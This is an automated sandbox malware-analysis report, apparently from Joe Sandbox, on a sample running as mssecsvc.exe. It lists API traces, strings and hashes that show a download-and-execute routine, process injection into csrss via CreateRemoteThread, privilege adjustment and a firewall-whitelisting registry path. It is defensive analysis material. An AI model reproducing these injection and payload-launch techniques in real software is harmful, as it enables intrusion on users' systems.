Instruction Fuzzy Hash: C821D2B1145306BFE7215B20DC8EFFF3A2DEF95B10F000119FA4A99081D7B19A15C6BA

Function 7FE427A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,7FE427A3,00000000,?), ref: 7FE427A8
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE427A3,00000000,?), ref: 7FE427C3
InternetReadFile.WININET(?,?,00000104), ref: 7FE427DD
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE427A3), ref: 7FE42823
InternetCloseHandle.WININET(?), ref: 7FE42833
InternetCloseHandle.WININET(00000000), ref: 7FE4283A

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
String ID:
API String ID: 3452404049-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: 22dcc7b0365fcf1d6eb4fed4657db19a0a0b5e3cffdb9644fcda0f43dbdbc4f6
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: B8116DB1100606BBEB250F21DC4EFFF7A2DEF89B14F004519FA0699080DBF5AA5196A8

Function 7FE410CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(039EF878), ref: 7FE4113D
GetProcAddress.KERNEL32(00000000,7FE411D6), ref: 7FE41148

Strings

.DLL, xrefs: 7FE41133

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction ID: ea4a2056f9d9eec985f90d0e6f51664608bc9cd6dcfcab51fc2ae76c9b6c8238
Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction Fuzzy Hash: D301E130607204EACF538F38E945BBE3B7DEB04265F20211DF90A8A759C7789A408B95

Analysis Process: mssecsvc.exePID: 1196, Parent PID: 624COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	656
Total number of Limit Nodes:	1

Executed Functions

Function 00AA042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00AA04BE
GetVersion.KERNEL32 ref: 00AA0500
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00AA0528
CloseHandle.KERNELBASE(?), ref: 00AA05AD

Strings

csrs, xrefs: 00AA082C
\BaseNamedObjects\tputVt, xrefs: 00AA0709, 00AA072C, 00AA073A
\BaseNamedObjects\tputVt, xrefs: 00AA0708

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\tputVt$\BaseNamedObjects\tputVt$csrs
API String ID: 3017432202-3247437241
Opcode ID: 43ec0803d0a0dafcaea35956b0059ac1bcfa55dd341d92edebfb48273f019b49
Instruction ID: 27225b2e9173ce1f7a9b751ffe59a3dc6067c7b38158881fd5a7cf341c89d9c7
Opcode Fuzzy Hash: 43ec0803d0a0dafcaea35956b0059ac1bcfa55dd341d92edebfb48273f019b49
Instruction Fuzzy Hash: 59B1AA71A05249FFEB229F24C80AFAA3BA9EF46311F104028F9099F1C1C7F49F558B59

Function 00AA05F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 00AA05AD
GetModuleHandleA.KERNEL32(00AA05EC), ref: 00AA05F2
lstrcpyW.KERNEL32(\BaseNamedObjects\tputVt,\BaseNamedObjects\tputVt,?,?,?,?), ref: 00AA070A
lstrcpyW.KERNEL32(\BaseNamedObjects\tputVt,?), ref: 00AA072D
lstrcatW.KERNEL32(\BaseNamedObjects\tputVt,\tputVt), ref: 00AA073B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00AA076B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00AA0786
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA07C9
Process32First.KERNEL32 ref: 00AA07DC
Process32Next.KERNEL32 ref: 00AA07ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA0805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AA0842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA085D
CloseHandle.KERNEL32 ref: 00AA086C

Strings

csrs, xrefs: 00AA082C
\BaseNamedObjects\tputVt, xrefs: 00AA0709, 00AA072C, 00AA073A
\BaseNamedObjects\tputVt, xrefs: 00AA0708

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\tputVt$\BaseNamedObjects\tputVt$csrs
API String ID: 1545766225-3247437241
Opcode ID: a0a38d7378b868c1c70dcdbeac2eb480934ad4b5eff30f61bc7bace271459fa5
Instruction ID: ab4a6eb41309c17a8bb9767f477bf019a1deef3ecd54addba5c22e7ae012fc64
Opcode Fuzzy Hash: a0a38d7378b868c1c70dcdbeac2eb480934ad4b5eff30f61bc7bace271459fa5
Instruction Fuzzy Hash: C6718832605209FFEB219F10C84AFAE3BADEF4A315F144028E9099F0D1C7B59F559B99

Function 00AA116F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 354
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00AA1162,00AA0796,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA116F

Part of subcall function 00AA1196: GetProcAddress.KERNEL32(00000000,00AA1180), ref: 00AA1197

Strings

\tputVt, xrefs: 00AA11C6

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: \tputVt
API String ID: 2574300362-2766679152
Opcode ID: 60c08aa42c25ea88f928a9d1c29bc0f36a0e3273d1dbb643ee977a8405c06a08
Instruction ID: 2e6dea318b6f737fe46a522a606f6933cd7a4f81a1094f5f8a699e084343e6ae
Opcode Fuzzy Hash: 60c08aa42c25ea88f928a9d1c29bc0f36a0e3273d1dbb643ee977a8405c06a08
Instruction Fuzzy Hash: 97B15521458AD17BCF63CF3488959EABFB1EE63B60F48469DE5C04F8D3D351A90683A1

Function 00AA252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 00AA255E

Strings

\BaseNamedObjects\tputVt, xrefs: 00AA254B

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: OpenSection
String ID: \BaseNamedObjects\tputVt
API String ID: 1950954290-2261315748
Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278

Function 00AA2574 Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA252F: NtOpenSection.NTDLL(?,0000000E), ref: 00AA255E

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00AA25A4
CloseHandle.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00AA0815), ref: 00AA25AC

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction ID: 0a1df78cb6ed2ad5636a6c5b2f9ae867b4f5a90d134c5f1cc5141357611e176e
Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction Fuzzy Hash: 77210770300646ABEB28DF69CC56FAA7369EF82744F400118F8198F1D4DBB1AE24C718

Function 00AA1422 Relevance: 3.0, APIs: 2, Instructions: 38
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 00AA145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 00AA146A

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: a37aca55b8afbb6b8d0cee772d19627416255012f83b142472a08d4b437a2e1f
Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
Opcode Fuzzy Hash: a37aca55b8afbb6b8d0cee772d19627416255012f83b142472a08d4b437a2e1f
Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4

Function 00AA2477 Relevance: 3.0, APIs: 2, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00AA249B
NtWriteVirtualMemory.NTDLL ref: 00AA24A4

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A

Function 00AA144A Relevance: 3.0, APIs: 2, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 00AA145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 00AA146A

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5

Function 00AA07AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
processthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA144A: LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 00AA145A
Part of subcall function 00AA144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 00AA146A

CloseHandle.KERNELBASE(?), ref: 00AA05AD
FreeLibrary.KERNEL32(75670000,?,00AA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA07B8
CloseHandle.KERNELBASE(?,?,00AA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA07BF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA07C9
Process32First.KERNEL32 ref: 00AA07DC
Process32Next.KERNEL32 ref: 00AA07ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA0805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AA0842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AA085D
CloseHandle.KERNEL32 ref: 00AA086C

Strings

csrs, xrefs: 00AA082C

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: 8d5e3ab4414ff2dfe575c99e9aadfff08d388ec98e39153f9fbfe167d061c0cd
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: C8113030501205BBEB255F21CD49FBF3A6DEF46701F00002CFD4ADA081D7B49F019A6A

Function 7FE44499 Relevance: 4.6, APIs: 3, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FE44406,?,7FE443E8,?,7FE443C4), ref: 7FE444ED
CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FE44565
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FE4459A

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$Create$MappingView
String ID:
API String ID: 1299149932-0
Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
Instruction ID: 7546c9a9d357b7e1dadf9586052fd295a6a3be759e7d42c7efdb4b51d27ad5e1
Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
Instruction Fuzzy Hash: 22216070305309BFEF218E619C45BBA366CAF00219F51122DFE2A9E094D7F4AF058728

Function 00AA05BA Relevance: 1.3, APIs: 1, Instructions: 7
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(0000000A,00AA085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00AA05C1

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction ID: 91f970c01e068a77b02b57f156d51bc68ece8a326129f86bda64c9c3de2d5c1b
Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction Fuzzy Hash: 28B0123864030296DA140910440DF041A347F03B11FE04059E2064E0C007E407001C09

Non-executed Functions

Function 00AA3C3D Relevance: 47.7, APIs: 21, Strings: 6, Instructions: 487
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 00AA3CA1
GetProcAddress.KERNEL32(00000000,00000002), ref: 00AA3CD4
GetProcAddress.KERNEL32(00000000,00AA3D41), ref: 00AA3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AA3D5F
GetTickCount.KERNEL32 ref: 00AA3D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AA6EF6,00000000,00000000,00000000,00000000), ref: 00AA3E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AA3EE2

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
ADVAPI32.DLL, xrefs: 00AA3D5E
020a00 . . :#73204497e +*, xrefs: 00AA3CA0, 00AA3D06, 00AA3D16, 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 1749273276-1098094878
Opcode ID: 3b3a8a3192dd475763d45222a96a185a3ef968de58b42c5bf8551b3c780efb2c
Instruction ID: 1bb64e019010e4183f134fec110f79de46e840a913cbfd645d35f682bd941653
Opcode Fuzzy Hash: 3b3a8a3192dd475763d45222a96a185a3ef968de58b42c5bf8551b3c780efb2c
Instruction Fuzzy Hash: 1002C072418258BFEB219F248C4ABEA7BACEF42310F044559F9499F0C2D7F45F4987A6

Function 7FE43C3D Relevance: 47.7, APIs: 21, Strings: 6, Instructions: 487
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 7FE43CA1
GetProcAddress.KERNEL32(00000000,00000002), ref: 7FE43CD4
GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
GetTickCount.KERNEL32 ref: 7FE43D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43CA0, 7FE43D06, 7FE43D16, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
ADVAPI32.DLL, xrefs: 7FE43D5E
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 1749273276-1098094878
Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction ID: a9c893c36cba37f36994ff1ade31cd64da17a3bb77e2321a458bf3f53f95c566
Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction Fuzzy Hash: 9102E071509358BFEB229F209C0ABEA7BACEF41304F00551DFC4A9E081D6F46F459BA6

Function 00AA3CC2 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 432
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00AA3CBA), ref: 00AA3CC2
GetProcAddress.KERNEL32(00000000,00000002), ref: 00AA3CD4
GetProcAddress.KERNEL32(00000000,00AA3D41), ref: 00AA3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AA3D5F
GetTickCount.KERNEL32 ref: 00AA3D93

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
ADVAPI32.DLL, xrefs: 00AA3D5E
020a00 . . :#73204497e +*, xrefs: 00AA3D16, 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 2837544101-1098094878
Opcode ID: 9b70a38c1194afa68475894e3a227ac40eb20d30a27607f9878cba57f3019f6e
Instruction ID: 781ab1709a196a277684e130d25bfb671fcadc037e7e1dc010c2f33fa9bd0964
Opcode Fuzzy Hash: 9b70a38c1194afa68475894e3a227ac40eb20d30a27607f9878cba57f3019f6e
Instruction Fuzzy Hash: E9E1DE72518258BFEB25AF248C4ABEA7BACEF42300F044559F8499F0C2D7F45F4987A5

Function 7FE43CC2 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 432libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(7FE43CBA), ref: 7FE43CC2
GetProcAddress.KERNEL32(00000000,00000002), ref: 7FE43CD4
GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
GetTickCount.KERNEL32 ref: 7FE43D93

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43D16, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
ADVAPI32.DLL, xrefs: 7FE43D5E
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 2837544101-1098094878
Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction ID: c453ebe4c61d0623fc47b3a56a20a6bb1634521f5f2c168e6baeb2cb6925c9c1
Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction Fuzzy Hash: CEE1F171509358BFEB229F209C4ABEA7BACEF41304F00555DFC4A8E081D6F46F059BA6

Function 00AA3CF0 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 409COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00AA3CE5), ref: 00AA3CF0
GetSystemDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 00AA3D07

Part of subcall function 00AA3D1F: lstrcat.KERNEL32(020a00 . . :#73204497e +*,00AA3D12), ref: 00AA3D20
Part of subcall function 00AA3D1F: GetProcAddress.KERNEL32(00000000,00AA3D41), ref: 00AA3D4C
Part of subcall function 00AA3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AA3D5F
Part of subcall function 00AA3D1F: GetTickCount.KERNEL32 ref: 00AA3D93
Part of subcall function 00AA3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AA6EF6,00000000,00000000,00000000,00000000), ref: 00AA3E65

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
